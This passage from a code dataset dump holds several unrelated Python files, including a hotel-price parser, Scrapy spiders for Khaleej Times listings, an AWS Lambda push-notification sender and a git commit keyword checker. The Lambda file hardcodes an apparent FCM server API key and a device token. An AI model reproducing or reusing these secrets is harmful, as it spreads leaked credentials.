self.parser_data['meta']['cachePageURL']\r\n\r\n @property\r\n def parsed__supplier(self):\r\n return 'dotwconnect'\r\n\r\n @property\r\n def parsed__city_zone(self):\r\n return self.parser_data['city_zone']\r\n\r\n\r\nclass RoomType(ParserBase):\r\n PROPERTIES = []\r\n\r\n EXTRA_FIELDS = ['room_types']\r\n\r\n def __init__(self, parser_data):\r\n self.room_type_html = html.fromstring(parser_data['roomTypes']['roomTypeHTML'])\r\n self.room_price_html = html.fromstring(parser_data['roomTypes']['priceHTML'])\r\n self.room_boardtype_html = html.fromstring(parser_data['roomTypes']['boardTypeHTML'])\r\n\r\n check_in = datetime.datetime.strptime(parser_data['checkIn'].split(' ')[0], '%Y-%m-%d')\r\n check_out = datetime.datetime.strptime(parser_data['checkOut'].split(' ')[0], '%Y-%m-%d')\r\n nights = check_out - check_in\r\n self.days = nights.days\r\n super().__init__(parser_data)\r\n\r\n def board_code_func(self, row):\r\n room_only = ['breakfast is available for a fee', 'breakfast excl', 'brkfast excl', 'no breakfast', 'offers on-site dining for breakfast at affordable prices', 'self-catering', \"room Only(includes 2 breakfasts)\", \"solo alojamiento(wi-fi Gratis)\", \"solo habitacion\", \"solo habitaci?n\", \"solo alojamiento con cocina\", \"solo alojamiento\", \"solo alojamiento(ro)\", \"room only\"]\r\n\r\n bed_brkfst = ['bed & breakfast', 'breakfast', 'english breakfast included', 'buffet breakfast', 'breakfast included', 'brkfast', 'cold breakfast', 'bed and breakfast', \"alojamiento y desayuno\", \"habitaci?n y desayuno\", \"habitacion y desayuno\", \"alojamiento y desayuno(wi-fi gratis)\", \"desayuno Buffet\", \"desayuno Buffet Fr?o\", \"desayuno continental\"]\r\n\r\n half_board = ['half board', 'breakfast and dinner', \"media pensi?n\", \"media pension\", \"media pensi?n(wi-fi gratis)\", \"media pension(wi-fi gratis)\"]\r\n\r\n full_board = ['full board', 'full board beverages included', \"pensi?n completa\", \"pension completa\"]\r\n\r\n all_incl = ['inclusive', \"todo incluido\"]\r\n\r\n others = ['other']\r\n\r\n for i in room_only:\r\n if i in row.lower():\r\n return 'RO', 'Room Only'\r\n\r\n for i in bed_brkfst:\r\n if i in row.lower():\r\n return 'BB', 'Bed and Breakfast'\r\n\r\n for i in half_board:\r\n if i in row.lower():\r\n return 'HB', 'Half Board'\r\n \r\n for i in full_board:\r\n if i in row.lower():\r\n return 'FB', 'Full Board'\r\n \r\n for i in all_incl:\r\n if i in row.lower():\r\n return 'AI', 'All Inclusive'\r\n \r\n for i in others:\r\n if i in row.lower():\r\n return 'OX', 'Others'\r\n\r\n def _get_promotions(self, board):\r\n \"\"\"\r\n process promotions for each room if any\r\n :param board: list of room elements for the hotel\r\n :return: list of promotion description and promotion status\r\n \"\"\"\r\n promo_status = []\r\n promo_desc_lst = []\r\n for i in board:\r\n val = i.xpath(ParserBase.CONFIG_FILE.RoomType__promotion)\r\n if len(val) > 0:\r\n promos = json.loads(val[0])[1]\r\n promo_desc = ''\r\n for k in promos.keys():\r\n if k.startswith('h'):\r\n promo_desc += promos[k]\r\n else:\r\n promo_status.append('Y')\r\n promo_desc_lst.append(promo_desc)\r\n else:\r\n promo_status.append('N')\r\n promo_desc_lst.append('')\r\n\r\n return promo_status, promo_desc_lst\r\n\r\n @property\r\n def parsed__room_types(self):\r\n \"\"\"\r\n :return:\r\n \"\"\"\r\n types = self.room_type_html.xpath(ParserBase.CONFIG_FILE.RoomType__type)\r\n\r\n prices = [ i.attrib['data-roomformattedprice.1']\r\n for i in self.room_price_html.xpath(ParserBase.CONFIG_FILE.RoomType__price) ]\r\n\r\n currency = [i.attrib['data-currency.1']\r\n for i in self.room_price_html.xpath(ParserBase.CONFIG_FILE.RoomType__currency)]\r\n\r\n boards = self.room_boardtype_html.xpath(ParserBase.CONFIG_FILE.RoomType__boardType)\r\n\r\n payload = dict()\r\n payload['type'] = [i.strip() for i in types if len(i.strip()) > 0]\r\n payload['price'] = [i.strip() for i in prices if len(i.strip()) > 0]\r\n payload['boardType'] = [i.strip() for i in boards if len(i.strip()) > 0]\r\n payload['currency'] = [i.strip() for i in currency if len(i.strip()) > 0]\r\n\r\n board = deepcopy(self.room_type_html.xpath(ParserBase.CONFIG_FILE.RoomType__board))\r\n payload['promotion'], payload['promotionDesc'] = self._get_promotions(board)\r\n\r\n room_df = pd.DataFrame(payload, columns=list(payload.keys()))\r\n room_df['board_code'], room_df['board_name'] = zip(*room_df['boardType'].apply(self.board_code_func))\r\n days = self.days\r\n room_df['price'] = room_df['price'].str.replace(',', '')\r\n room_df['price'] = np.array(room_df['price'], dtype='str').astype(np.float)\r\n room_df['daily_price'] = room_df['price'].apply(lambda row: row / days)\r\n room_df['direct_payment'] = 'N'\r\n room_details = room_df.T.to_dict()\r\n\r\n return list(room_details.values())\r\n\r\n\r\ndef crawl_hotels(parser_data):\r\n \"\"\"\r\n :param parser_data:\r\n :return:\r\n \"\"\"\r\n # from pdb import set_trace; set_trace()\r\n response = parser_data.copy()\r\n # response['hotels'] = [crawl_hotel(hotel_data) for hotel_data in parser_data['hotels']]\r\n response['hotel'] = crawl_hotel(parser_data['hotel'])\r\n return response\r\n\r\n\r\ndef crawl_hotel(hotel_data):\r\n hotel_meta = hotel_data['meta'].copy()\r\n hotel_payload = Hotel(hotel_data).complete_parsed_values\r\n room_types_payload = RoomType(hotel_data).complete_parsed_values\r\n mongo_data = dict()\r\n mongo_data.update(hotel_payload)\r\n mongo_data.update(room_types_payload)\r\n mongo_data.update({'meta': hotel_meta})\r\n return mongo_data\r\n","sub_path":"eCube_Hotel_2/HotelMessaging/AetosParsingService/scripts/ParserDOTWPython.py","file_name":"ParserDOTWPython.py","file_ext":"py","file_size_in_byte":8054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"530750758","text":"# 自定义异常处理\nfrom rest_framework.response import Response\nfrom rest_framework.views import exception_handler as drf_exception_handler\nfrom rest_framework import status\ndef exception_handler(exc,context):\n # print(exc,'01010101',context)\n\n # 详细错误信息的定义\n error=\"%s %s %s\"%(context['view'],context['request'].method,exc)\n print(error)\n\n # 先让drf处理,drf无法处理(返回值为None)再由自定义异常处理\n response=drf_exception_handler(exc,context)\n if response is None:\n return Response(\n {'error_msg':'程序失误了,请稍等一会'},\n status=status.HTTP_500_INTERNAL_SERVER_ERROR,exception=None\n )\n # return Response({'error_msg':error}) #error替换掉原来的内容\n # 异常信息不为空,说明异常已被drf处理\n return None","sub_path":"utils/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"602837240","text":"import boto3\nimport json\nimport datetime\nfrom datetime import date, timedelta\nfrom pyfcm import FCMNotification\n\ns3_client = boto3.client('s3')\ns3_resource = boto3.resource('s3')\ncolors_bucket_name=\"rgb-colors\"\n\ndef get_color_values_from_bucket():\n colors_file_path = \"colors.json\" # filepath == key\n \n yesterday = date.today() - timedelta(days=1)\n yesterday = yesterday.strftime('%Y-%m-%d')\n \n print(yesterday)\n \n for obj in s3_client.list_objects_v2(Bucket=colors_bucket_name)[\"Contents\"]:\n if (\"colors-\" + yesterday) in obj[\"Key\"]:\n colors_file_path = obj[\"Key\"]\n break\n \n print(colors_file_path)\n \n obj = s3_resource.Object(colors_bucket_name, colors_file_path)\n \n colors = json.load(obj.get()['Body'])\n \n return colors\n\ndef load_registration_ids():\n colors_bucket_name = \"rgb-device-data\"\n colors_file_path = \"registration-ids.json\"\n \n obj = s3_resource.Object(colors_bucket_name, colors_file_path)\n \n registration_ids_list = json.load(obj.get()['Body'])\n\n return registration_ids_list\n\ndef lambda_handler(event, context):\n push_service = FCMNotification(api_key=\"AAAAAep1hT0:APA91bFwPzY_2h94K5CJSZGpfaubJVroCTXQwqMAAqxLGtzZYw3tLwuUmc3hTxqasr8JqpAsU4z4hc-6wOZESP4KWblgWTSEFb8qi-qVjsor_EbrSpKInGh51A1rPCTXPX543xeBGv7J\")\n \n registration_id = \"c9gvODnd0zs:APA91bEJ3NWj7vJ3dU-Vvk0VYNeqXLhR1pBLJ9FNOaCBa6IC-7q59rj7E-fEbM0NysbFCSpzWlZSsHsGBkTcKAREsBZqVZ_lnex9zwrFGx5FHtpiaEikGekZnj5_LNaIX_2CXscKjqGs\"\n \n try:\n print(event)\n message_title = event[\"Records\"][0][\"Sns\"][\"Message\"]\n message_body=\"\"\n except:\n colors = get_color_values_from_bucket()\n message_title = \"Colors yesterday\"\n message_body = \"Red: \" + str(colors[\"red\"]) + \" Green: \" + str(colors[\"green\"]) + \" Blue: \" + str(colors[\"blue\"])\n \n registration_ids = load_registration_ids()\n \n for registration_id in registration_ids:\n result = push_service.notify_single_device(registration_id=registration_id, message_title=message_title,\n message_body=message_body)\n\n return {\n 'statusCode': 200,\n 'body': json.dumps('Push notification sent')\n }","sub_path":"Lambda/push_notifications.py","file_name":"push_notifications.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"496040275","text":"class BSTIterator:\n\n def __init__(self, root):\n self.stack = []\n node = root\n while node:\n self.stack.append(node)\n node = node.left\n \n def next(self) -> int:\n \"\"\"\n @return the next smallest number\n \"\"\"\n node = self.stack.pop()\n x = node.right\n while x:\n self.stack.append(x)\n x = x.left\n return node.val\n \n\n def hasNext(self) -> bool:\n \"\"\"\n @return whether we have a next smallest number\n \"\"\"\n return len(self.stack) > 0","sub_path":"medium/test_173.py","file_name":"test_173.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"52301190","text":"#Duplicate_By_week\r\nimport pandas as pd\r\nimport numpy as np, os,glob\r\n\r\n\r\n#memory efficient banana h\r\ndf_Final = pd.DataFrame()\r\nfor file in glob.iglob(os.path.join(os.path.expanduser('~'),'Downloads\\MBI Analysis\\Consolidated\\*.xlsx')):\r\n df = pd.read_excel(file,sheet_name='Sheet1',header=0)\r\n df['MBI #'] = df['MBI #'].astype(str).str.strip(\" \")\r\n df= df[df.duplicated(['MBI #'], keep=False)] \r\n filename=os.path.basename(file)\r\n name=os.path.splitext(filename)[0]\r\n df['Week'] = name\r\n df_Final=df_Final.append(df)\r\n del df\r\ndf_Final[\"MBI #\"] = df_Final[\"MBI #\"].replace(\"nan\",\"\") \r\ndf_Final.to_csv(\"C:\\\\Users\\\\rrathi\\\\Downloads\\\\MBI Analysis\\\\Duplicate_By_week.csv\", encoding='utf-8', index=False )\r\n\r\n\r\ndel df_Final","sub_path":"Duplicate by week.py","file_name":"Duplicate by week.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"651105435","text":"import scrapy\nimport pdb\nfrom babel.items import *\nfrom datetime import datetime \nimport re\nimport unicodedata\n\n# validate the value of html node\n# return string value, if data is validated\n# return \"\", otherwise\ndef validate(node):\n if len(node) > 0:\n value = node.extract_first().strip()\n return value\n else: \n return \"\"\n\n#convert date format\ndef correct_date(ori_date):\n if ori_date == \"\":\n return \"\"\n return datetime.strptime(ori_date, '%B %d, %Y %I:%M %p').strftime('%Y-%m-%d %H:%M:%S')\n\n#Get Price from str\ndef extract_price(pri_str):\n return pri_str.split(\" \", 1)[-1]\n\n#Initialize BaseItem Class\ndef init_base_item(item):\n item[\"category_id\"] = item[\"category\"] = item[\"item_type\"] = item[\"title\"] = item[\"post_date\"] = item[\"price\"] = item[\"details\"] = item[\"contact_name\"] = item[\"contact_email\"] = item[\"expiration_date\"] = \"\"\n item[\"image_urls\"] = item[\"image_names\"] = item[\"images\"] = [] \n\nclass KhaleejcarsSpider(scrapy.Spider):\n #name of the spider\n name = \"khaleejcars\"\n\n #list of allowed domains\n allowed_domains = [\"buzzon.khaleejtimes.com\"]\n \n #list of urls\n start_urls = [\n \"http://buzzon.khaleejtimes.com/ad-category/used-cars/\",\n ]\n\n #domain url\n domain = \"http://buzzon.khaleejtimes.com\"\n\n def parse(self, response):\n total_num = validate(response.xpath('.//h1[@class=\"single dotted\"]/text()'))\n total_num = unicodedata.normalize('NFKD', total_num).encode('ascii','ignore')\n total_num = int(filter(str.isdigit, total_num))\n page_num = total_num / 15\n if total_num % 15 != 0:\n page_num += 1 \n for page in range(1, page_num):\n url = \"http://buzzon.khaleejtimes.com/ad-category/used-cars/page/%s/\" % page\n request = scrapy.Request(url, callback=self.parse_each_page)\n request.meta[\"page\"]=page\n yield request\n\n #parse main car list\n #get the make and made info for each car\n def parse_each_page(self, response):\n page = response.meta[\"page\"]\n for car in response.xpath('//div[@class=\"content_left\"]//div[contains(@class, \"post-block-out \")]'):\n car_detail_url = validate(car.xpath('.//a/@href'))\n request = scrapy.Request(car_detail_url, callback=self.parse_car_detail)\n yield request\n\n #parse car detail\n #get the detail info for each car\n def parse_car_detail(self, response):\n car = self.init_car()\n car[\"category\"] = \"Cars\"\n car[\"item_type\"] = \"car\"\n car[\"title\"] = validate(response.xpath('//h1[@class=\"single-listing\"]/a/text()'))\n car[\"make\"] = validate(response.xpath('//li[@id=\"cp_car_brand\"]/text()'))\n car[\"model\"] = validate(response.xpath('//li[@id=\"cp_model\"]/text()'))\n car[\"price\"] = extract_price(validate(response.xpath('//p[@class=\"post-price\"]/text()')))\n car[\"year\"] = validate(response.xpath('//li[@id=\"cp_year\"]/text()'))\n car[\"body_style\"] = validate(response.xpath('//li[@id=\"cp_body_style\"]/text()'))\n car[\"seller\"] = validate(response.xpath('//li[@id=\"cp_seller_type\"]/text()'))\n car[\"doors\"] = validate(response.xpath('//li[@id=\"cp_doors\"]/text()'))\n car[\"color\"] = validate(response.xpath('//li[@id=\"cp_color\"]/text()'))\n car[\"mileage\"] = validate(response.xpath('//li[@id=\"cp_mileage\"]/text()'))\n car[\"warranty\"] = validate(response.xpath('//li[@id=\"cp_warranty\"]/text()'))\n car[\"contact_number\"] = validate(response.xpath('//li[@id=\"cp_contact_no\"]/text()'))\n car[\"contact_email\"] = validate(response.xpath('//li[@id=\"cp_email_address\"]/a/text()'))\n car[\"mileage\"] = validate(response.xpath('//li[@id=\"cp_mileage\"]/text()'))\n car[\"post_date\"] = correct_date(validate(response.xpath('//li[@id=\"cp_listed\"]/text()')))\n car[\"expiration_date\"] = validate(response.xpath('//li[@id=\"cp_expires\"]/text()'))\n car[\"image_urls\"] = response.xpath('//div[@class=\"bigleft\"]//img/@src').extract()\n car[\"details\"] = \" \".join(response.xpath('//div[@class=\"single-main\"]//p/text()').extract())\n num = 0\n return car\n\n def init_car(self):\n car = Car() \n init_base_item(car)\n car[\"title\"] = car[\"make\"] = car[\"model\"] = car[\"year\"] = car[\"drive_train\"] = car[\"seller\"] = car[\"price\"] = car[\"post_date\"] = car[\"body_style\"] = car[\"mileage\"] = car[\"transmission\"] = car[\"fuel_type\"] = car[\"cylinders\"] = car[\"doors\"] = car[\"ext_color\"] = car[\"int_color\"] = car[\"vin\"] = car[\"warranty\"] = car[\"color\"] = \"\"\n car[\"category_id\"] = \"31\"\n car[\"image_urls\"] = car[\"image_names\"] = car[\"images\"] = []\n car[\"region\"] = \"\"\n return car\n\n def get_transmission(self, trans_str):\n if trans_str.upper().startswith('A'):\n return \"AUTO\"\n return \"MANUAL\"\n \n def get_fuel_type(self, fuel_type_str):\n if fuel_type_str.upper().startswith('D'):\n return 'DIESEL'\n elif (fuel_type_str.upper().startswith('G') or fuel_type_str.upper().startswith('P')):\n return 'GASOLINE'\n elif fuel_type_str.upper().startswith('E'):\n return 'ELECTRIC-HYBRID'\n else:\n return 'OTH'\n \n def get_warranty(self, warranty_str):\n if str != \"\":\n return 1\n return 0\n\nclass KhaleejjobsSpider(scrapy.Spider):\n #name of the spider\n name = \"khaleejjobs\"\n\n #list of allowed domains\n allowed_domains = [\"buzzon.khaleejtimes.com\"]\n \n #list of urls\n start_urls = [\n \"http://buzzon.khaleejtimes.com/ad-category/jobs-vacancies/\",\n ]\n \n #domain url\n domain = \"buzzon.khaleejtimes.com\"\n \n def parse(self, response):\n total_num = validate(response.xpath('.//h1[@class=\"single dotted\"]/text()'))\n total_num = unicodedata.normalize('NFKD', total_num).encode('ascii','ignore')\n total_num = int(filter(str.isdigit, total_num))\n page_num = total_num / 15\n if total_num % 15 != 0:\n page_num += 1 \n for page in range(1, page_num):\n url = \"http://buzzon.khaleejtimes.com/ad-category/jobs-vacancies/page/%s/\" % page\n request = scrapy.Request(url, callback=self.parse_each_page)\n request.meta[\"page\"]=page\n yield request\n\n #parse main car list\n #get the make and made info for each car\n def parse_each_page(self, response):\n page = response.meta[\"page\"]\n for job in response.xpath('//div[@class=\"content_left\"]//div[contains(@class, \"post-block-out \")]'):\n job_detail_url = validate(job.xpath('.//a/@href'))\n request = scrapy.Request(job_detail_url, callback=self.parse_job_detail)\n yield request\n\n def parse_job_detail(self, response):\n job = self.init_job()\n job[\"category\"] = map((lambda x:x.strip()),response.xpath('//div[@itemprop=\"breadcrumb\"]//a//text()').extract())[-1]\n job[\"title\"] = validate(response.xpath('//h1[@class=\"single-listing\"]/a/text()'))\n job[\"post_date\"] = correct_date(validate(response.xpath('//li[@id=\"cp_listed\"]/text()')))\n job[\"details\"] = \" \".join(response.xpath('//div[@class=\"single-main\"]//p/text()').extract())\n job[\"image_urls\"] = response.xpath('//div[@class=\"bigleft\"]//img/@src').extract()\n job[\"contact_email\"] = validate(response.xpath('//li[@id=\"cp_email_address\"]/a/text()'))\n job[\"expiration_date\"] = validate(response.xpath('//li[@id=\"cp_expires\"]/text()'))\n\n job[\"name\"] = validate(response.xpath('//li[@id=\"cp_industry\"]/text()'))\n job[\"job_type\"] = validate(response.xpath('//li[@id=\"cp_career\"]/text()'))\n job[\"status\"] = validate(response.xpath('//li[@id=\"cp_job_type\"]/text()'))\n job[\"salary\"] = validate(response.xpath('//li[@id=\"cp_salary\"]/text()'))\n job[\"location\"] = validate(response.xpath('//li[@id=\"cp_job_location\"]/text()'))\n job[\"code\"] = \"\"\n return job\n\n def init_job(self):\n job = Job()\n init_base_item(job)\n job[\"item_type\"] = \"job\"\n job[\"title\"] = job[\"name\"] = job[\"post_date\"] = job[\"job_type\"] = job[\"status\"] = job[\"category\"] = job[\"salary\"] = job[\"price\"] = job[\"details\"] = \"\"\n job[\"category_id\"] = \"3\"\n job[\"e_relation\"] = \"LOOKING\"\n job[\"fk_c_locale_code\"] = \"en_US\"\n job[\"image_urls\"] = job[\"image_names\"] = job[\"images\"] = []\n job[\"s_desired_exp\"] = job[\"s_studies\"] = job[\"s_minimum_requirements\"] = job[\"s_desired_requirements\"] = job[\"s_contract\"] = job[\"s_company_description\"] = \"\" \n job[\"region\"] = \"\"\n return job\n\nclass KhaleejpropertySpider(scrapy.Spider):\n #name of the spider\n name = \"khaleejproperty\"\n\n #list of allowed domains\n allowed_domains = [\"buzzon.khaleejtimes.com\"]\n \n #list of urls\n start_urls = [\n \"http://buzzon.khaleejtimes.com/ad-category/real-estate/\",\n ]\n \n #domain url\n domain = \"http://buzzon.khaleejtimes.com/\"\n\n def parse(self, response):\n total_num = validate(response.xpath('.//h1[@class=\"single dotted\"]/text()'))\n total_num = unicodedata.normalize('NFKD', total_num).encode('ascii','ignore')\n total_num = int(filter(str.isdigit, total_num))\n page_num = total_num / 15\n if total_num % 15 != 0:\n page_num += 1 \n for page in range(1, page_num):\n url = \"http://buzzon.khaleejtimes.com/ad-category/real-estate/page/%s/\" % page\n request = scrapy.Request(url, callback=self.parse_each_page)\n request.meta[\"page\"]=page\n yield request\n\n #parse main car list\n #get the make and made info for each car\n def parse_each_page(self, response):\n page = response.meta[\"page\"]\n for house in response.xpath('//div[@class=\"content_left\"]//div[contains(@class, \"post-block-out \")]'):\n house_detail_url = validate(house.xpath('.//a/@href'))\n request = scrapy.Request(house_detail_url, callback=self.parse_house_detail)\n yield request\n\n def parse_house_detail(self, response):\n house = self.init_house()\n category = map((lambda x:x.strip()),response.xpath('//div[@itemprop=\"breadcrumb\"]//a//text()').extract())[-1]\n house[\"category\"] = category\n house[\"item_type\"] = \"house\"\n house[\"title\"] = validate(response.xpath('//h1[@class=\"single-listing\"]/a/text()'))\n house[\"post_date\"] = correct_date(validate(response.xpath('//li[@id=\"cp_listed\"]/text()')))\n house[\"price\"] = extract_price(validate(response.xpath('//p[@class=\"post-price\"]/text()')))\n house[\"details\"] = \" \".join(response.xpath('//div[@class=\"single-main\"]//p/text()').extract())\n house[\"contact_name\"] = \"\"\n house[\"contact_email\"] = validate(response.xpath('//li[@id=\"cp_email_address\"]/text()'))\n house[\"image_urls\"] = response.xpath('//div[@class=\"bigleft\"]//img/@src').extract()\n \n house[\"name\"] = \"\"\n house[\"yearly_rent\"] = \"\"\n house[\"plot_size\"] = \"\"\n house[\"sub_community\"] = validate(response.xpath('//li[@id=\"cp_city\"]/text()'))\n house[\"parking\"] = validate(response.xpath('//li[@id=\"cp_parking\"]/text()')).split(\" \")[0]\n house[\"reference_number\"] = \"\"\n house[\"bedroom\"] = validate(response.xpath('//li[@id=\"cp_bedrooms\"]/text()')).split(\" \")[0]\n house[\"full_baths\"] = validate(response.xpath('//li[@id=\"cp_bathroom\"]/text()'))\n house[\"square_feet\"] = validate(response.xpath('//li[@id=\"cp_area_in_sq_ft\"]/text()'))\n house[\"region\"] = \"\"\n return house\n\n def init_house(self):\n house = House()\n init_base_item(house)\n house[\"name\"] = house[\"yearly_rent\"] = house[\"post_date\"] = house[\"plot_size\"] = house[\"sub_community\"] = house[\"reference_number\"] = house[\"bedroom\"] = house[\"square_feet\"] = house[\"parking\"] = \"\"\n return house\n\n\nclass KhaleejclassifiedsSpider(scrapy.Spider):\n #name of the spider\n name = \"khaleejclassifieds\"\n\n #list of allowed domains\n allowed_domains = [\"buzzon.khaleejtimes.com\"]\n \n #list of urls\n start_urls = [\n \"http://buzzon.khaleejtimes.com/categories/\",\n ]\n \n #domain url\n domain = \"http://buzzon.khaleejtimes.com/\"\n\n def parse(self, response):\n for each_category_url in response.xpath('//div[@id=\"directory\"]//a/@href').extract():\n request = scrapy.Request(each_category_url, callback=self.parse_each_category)\n yield request\n\n def parse_each_category(self, response):\n total_num = validate(response.xpath('.//h1[@class=\"single dotted\"]/text()'))\n total_num = unicodedata.normalize('NFKD', total_num).encode('ascii','ignore')\n total_num = int(filter(str.isdigit, total_num))\n page_num = total_num / 15\n if total_num % 15 != 0:\n page_num += 1 \n for page in range(1, page_num):\n url = \"%spage/%s/\" % (response.url, page)\n request = scrapy.Request(url, callback=self.parse_each_page)\n request.meta[\"page\"]=page\n yield request\n\n #parse main car list\n #get the make and made info for each car\n def parse_each_page(self, response):\n page = response.meta[\"page\"]\n for classified in response.xpath('//div[@class=\"content_left\"]//div[contains(@class, \"post-block-out \")]'):\n classified_detail_url = validate(classified.xpath('.//a/@href'))\n request = scrapy.Request(classified_detail_url, callback=self.parse_classified_detail)\n yield request\n\n def parse_classified_detail(self, response):\n classified = self.init_classified()\n classified[\"category_id\"] = \"\"\n classified[\"category\"] = map((lambda x:x.strip()),response.xpath('//div[@itemprop=\"breadcrumb\"]//a//text()').extract())[1]\n classified[\"item_type\"] = \"classifieds\"\n classified[\"title\"] = validate(response.xpath('//h1[@class=\"single-listing\"]/a/text()'))\n classified[\"post_date\"] = correct_date(validate(response.xpath('//li[@id=\"cp_listed\"]/text()')))\n classified[\"price\"] = extract_price(validate(response.xpath('//p[@class=\"post-price\"]/text()')))\n classified[\"details\"] = \" \".join(response.xpath('//div[@class=\"single-main\"]//p/text()').extract())\n classified[\"image_urls\"] = response.xpath('//div[@class=\"bigleft\"]//img/@src').extract()\n classified[\"contact_name\"] = \"\"\n classified[\"contact_email\"] = validate(response.xpath('//li[@id=\"cp_email_address\"]/text()'))\n\n classified[\"location\"] = validate(response.xpath('//li[@id=\"cp_job_location\"]/text()'))\n classified[\"contact\"] = \"\"\n return classified\n\n def init_classified(self):\n classified = Classified()\n init_base_item(classified)\n classified[\"title\"] = classified[\"location\"] = classified[\"category\"] = classified[\"post_date\"] = classified[\"contact\"] = \"\"\n classified[\"image_urls\"] = classified[\"images\"] = []\n classified[\"region\"] = \"\"\n return classified","sub_path":"babel/spiders/khaleej_spider.py","file_name":"khaleej_spider.py","file_ext":"py","file_size_in_byte":14065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"407463976","text":"import os\r\n\r\n#Change the baseline variable to the directory of the client \r\nbaseline = 'C:/Daniel/apps/ColeParmer/test_data/'\r\n\r\noutfile = baseline+'datasizes.out'\r\n\r\ndef getDataFiles(baseline):\r\n #Creates output file\r\n ofile = open(outfile,'w')\r\n ofile.write('This script will output the line count of each data file at a 75% threshold for the data size check.\\n\\n')\r\n ofile.close()\r\n #Iterates through the ../test_data/baseline directory to grab all the data files\r\n for j in os.listdir(baseline):\r\n if '.py' not in j and '.zip' not in j:\r\n getLineCount(j);\r\n\r\ndef getLineCount(infile):\r\n file = open(infile, 'r')\r\n ofile = open(outfile,'a')\r\n #Counts the lines in each file and multiplies by .75 and writes the result to the output file.\r\n count = 0\r\n for line in file:\r\n count+=1\r\n count = count*.75\r\n ofile.write('('+str(count).split('.')[0]+\",'\"+infile+\"')\\n\")\r\n\r\ngetDataFiles(baseline)","sub_path":"scripts/countLines.py","file_name":"countLines.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"190831683","text":"#!/usr/bin/env python3.4\n#\n# Copyright 2017 - The Android Open Source Project\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport logging\nimport os\nimport re\nimport shellescape\n\nfrom acts.libs.proc import job\n\nGLOBAL_KEYWORDS_FILEPATH = 'vendor/google_testing/comms/framework/etc/' \\\n 'commit_keywords'\nLOCAL_KEYWORDS_FILEPATH = '~/.repo_acts_commit_keywords'\n\nGIT_FILE_ADDITIONS = r'git diff --unified=0 %s^! | grep \"^+\" | ' \\\n r'grep -Ev \"^(\\+\\+\\+ b/)\" | cut -c 2-'\n\nGIT_FILE_NAMES = r'git diff-tree --no-commit-id --name-only -r %s'\n\nGIT_DIFF_REGION_FOUND = 'git diff %s^! | grep -A10 -B10 %s'\nCOMMIT_ID_ENV_KEY = 'PREUPLOAD_COMMIT'\n\nFIND_COMMIT_KEYWORDS = 'git diff %s^! | grep -i %s'\nGET_EMAIL_ADDRESS = 'git log --format=%ce -1'\n\n\ndef find_in_commit_message(keyword_list):\n \"\"\"Looks for keywords in commit messages.\n\n Args:\n keyword_list: A list of keywords\n \"\"\"\n grep_args = ''\n for keyword in keyword_list:\n grep_args += '-e %s' % keyword\n\n result = job.run(\n FIND_COMMIT_KEYWORDS % (os.environ[COMMIT_ID_ENV_KEY], grep_args),\n ignore_status=True)\n\n if result.stdout:\n logging.error('Your commit message contains at least one keyword.')\n logging.error('Keyword(s) found in the following line(s):')\n logging.error(result.stdout)\n logging.error('Please fix/remove these before committing.')\n exit(1)\n\n\ndef get_words(string):\n \"\"\"Splits a string into an array of alphabetical words.\"\"\"\n s1 = re.sub('(.)([A-Z][a-z]+)', r'\\1 \\2', string)\n s1 = re.sub('([a-z0-9])([A-Z])', r'\\1 \\2', s1).lower()\n s1 = re.sub('[^a-z ]', ' ', s1)\n return s1.split()\n\n\ndef find_in_file_names(keyword_list):\n \"\"\"Looks for keywords in file names.\n\n Args:\n keyword_list: a list of keywords\n \"\"\"\n changed_files = job.run(GIT_FILE_NAMES % os.environ[COMMIT_ID_ENV_KEY])\n\n keyword_set = set(keyword_list)\n\n for file_name in changed_files.stdout.split('\\n'):\n words = set(get_words(file_name))\n if len(keyword_set.intersection(words)) > 0:\n logging.error('Your commit has a file name that contain at least '\n 'one keyword: %s.' % file_name)\n logging.error('Please update or remove this before committing.')\n exit(1)\n\n\ndef find_in_code_additions(keyword_list):\n \"\"\"Looks for keywords in code additions.\n\n Args:\n keyword_list: a list of keywords\n \"\"\"\n all_additions = job.run(GIT_FILE_ADDITIONS % os.environ[COMMIT_ID_ENV_KEY])\n\n keyword_set = set(keyword_list)\n\n for line in all_additions.stdout.split('\\n'):\n words = set(get_words(line))\n if len(keyword_set.intersection(words)) > 0:\n result = job.run(GIT_DIFF_REGION_FOUND %\n (os.environ[COMMIT_ID_ENV_KEY],\n shellescape.quote(line)))\n logging.error('Your commit has code changes that contain at least '\n 'one keyword. Below is an excerpt from the commit '\n 'diff:')\n logging.error(result.stdout)\n logging.error('Please update or remove these before committing.')\n exit(1)\n\n\ndef main():\n if COMMIT_ID_ENV_KEY not in os.environ:\n logging.error('Missing commit id in environment.')\n exit(1)\n keyword_file = os.path.join(\n os.path.dirname(__file__), '../../../../%s' % GLOBAL_KEYWORDS_FILEPATH)\n\n if not os.path.isfile(keyword_file):\n keyword_file = os.path.expanduser(LOCAL_KEYWORDS_FILEPATH)\n if not os.path.exists(keyword_file) or not os.path.isfile(keyword_file):\n result = job.run(GET_EMAIL_ADDRESS)\n if result.stdout.endswith('@google.com'):\n logging.error(\n 'You do not have the necessary file %s. Please run '\n 'tools/ignore_commit_keywords.sh, or link it with the '\n 'following command:\\n ln -sf /%s %s'\n % (LOCAL_KEYWORDS_FILEPATH, GLOBAL_KEYWORDS_FILEPATH,\n 